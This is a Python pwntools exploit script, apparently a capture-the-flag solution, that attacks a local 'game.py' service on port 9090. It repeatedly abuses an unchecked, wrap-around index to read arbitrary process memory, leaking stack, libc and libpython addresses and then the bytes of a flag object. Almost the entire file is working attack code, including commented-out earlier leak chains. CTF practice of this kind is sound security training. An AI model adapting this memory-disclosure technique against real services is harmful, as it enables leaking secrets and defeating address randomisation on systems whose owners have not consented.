from pwn import *
import psutil
import time

io = remote("localhost", 9090)
if args.DEBUG:
    time.sleep(1)
    filter = lambda p : "game.py" in p.cmdline()
    pid = [p.pid for p in psutil.process_iter() if filter(p)][0]
    util.misc.run_in_new_terminal(f"sudo -E gdb --pid={pid}")
    input()

def leak(offset, unpack=True):
    io.readuntil(b"Easy or Hard? ")
    io.sendline(b"hard")

    io.readuntil("Ready? ")
    io.sendline(b"")

    leak = []
    for i in range(8):
        io.readuntil(b"Index 1: ")
        io.sendline(str(0).encode())

        io.readuntil(b"Index 2: ")
        if offset < 0:
            io.sendline(str((1 << 64) + offset + i).encode())
        else:
            io.sendline(str(offset + i).encode())

        line = io.readline()
        leak.append(int(line.split(b" ")[1]))

    if unpack:
        return struct.unpack("<Q", bytes(leak))[0]
    else:
        return bytes(leak)

# stack_leak = leak(-0x28)
# numbers = stack_leak - 0x100
# print("numbers", hex(numbers))
# 
# libc_leak = leak(-0x18)
# libc_clock_gettime = 0x00000000000cd6a0
# libc_base = libc_leak - 29 - libc_clock_gettime
# print("libc", hex(libc_base))
# 
# libpython_base = libc_base + 0x1e7000
# print("libpython", hex(libpython_base))
# 
# pythonvars_leak = libpython_base + 0x390858
# vars_base = leak(pythonvars_leak - numbers)
# print("pythonvars", hex(vars_base))
# 
# flag_var = vars_base + 0x7fd00
# print("flag", hex(flag_var))

#for i in range(10):
#    print(leak(flag_var + i * 8 - numbers, False))

numbers = leak(-0x30)
print(numbers)
flagobj = leak(-0xb48)
print(flagobj)
flagstr = flagobj + 0x30

for i in range(4):
    print(leak(flagstr + i * 8 - numbers, False))